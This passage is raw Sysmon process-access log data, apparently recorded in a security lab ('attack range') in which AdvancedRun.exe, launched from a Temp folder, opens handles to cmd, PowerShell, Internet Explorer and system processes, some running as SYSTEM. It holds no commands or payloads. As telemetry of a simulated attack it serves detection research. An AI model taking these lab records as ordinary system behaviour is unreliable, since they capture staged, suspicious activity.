69|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.830{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 